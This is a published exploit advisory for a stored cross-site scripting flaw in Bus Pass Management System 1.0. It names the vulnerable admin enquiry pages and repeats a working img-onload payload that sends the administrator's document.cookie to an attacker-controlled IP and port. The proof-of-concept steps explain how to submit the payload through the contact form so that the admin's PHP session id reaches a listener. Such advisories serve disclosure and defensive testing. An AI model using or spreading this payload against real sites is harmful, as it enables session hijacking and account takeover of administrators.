# Exploit Title: Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) # Date: 2021-09-17 # Exploit Author: Matteo Conti - https://deltaspike.io # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip # Version: 1.0 # Tested on: Ubuntu 18.04 - LAMP # Description The application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message, maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it. # Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message) # Tested Payload: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie> # Prof of concept: - From /contact.php, send a message containing the following payload in "title" or "message" fields: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie> (the first url have to be an existing image) - Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php - Your listener will receive the PHP session id.